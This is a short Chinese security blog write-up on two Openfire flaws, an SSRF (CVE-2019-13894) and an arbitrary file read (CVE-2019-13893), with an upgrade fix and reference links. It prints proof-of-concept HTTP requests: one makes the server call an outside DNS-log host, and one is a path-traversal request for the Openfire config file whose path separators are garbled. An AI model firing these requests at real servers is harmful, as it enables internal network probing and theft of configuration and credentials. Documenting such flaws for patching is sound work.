0x01 简介
Openfire(以前称为Wildfire和Jive Messenger)是IgniteRealtime支持的Jabber服务器。它是一个跨平台的Java应用程序,将其自身定位为中型企业控制内部通信并简化即时消息传递的平台。
0x02 SSRF CVE-2019-13894
此漏洞允许未经身份验证的攻击者向内部网络发送任意HTTP GET请求,并从目标Web服务获取完整的输出。
PoC:
GET /getFavicon?host=jd7uyj.dnslog.cn HTTP/1.1
推荐两个在线测试监控平台
http://ceye.io/http://www.dnslog.cn/
0x03 CVE-2019-13893 任意文件读取
PoC:
GET /plugins/search/......confopenfire.xml HTTP/1.1Host: localhost:9090Cookie: JSESSIONID=node01aaib5x4g4p781q3i2m2tm74u91.node0;
(此漏洞小编没有搭建环境,只复现了SSRF,图片来源于某大佬)
0x04 修复建议
如果您有Openfire服务器,请确保已将其更新到4.4.3或更高版本。
0x05 参考链接
https://www.seebug.org/vuldb/ssvid-98328https://swarm.ptsecurity.com/openfire-admin-console/https://www.cnblogs.com/potatsoSec/p/13437713.html
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论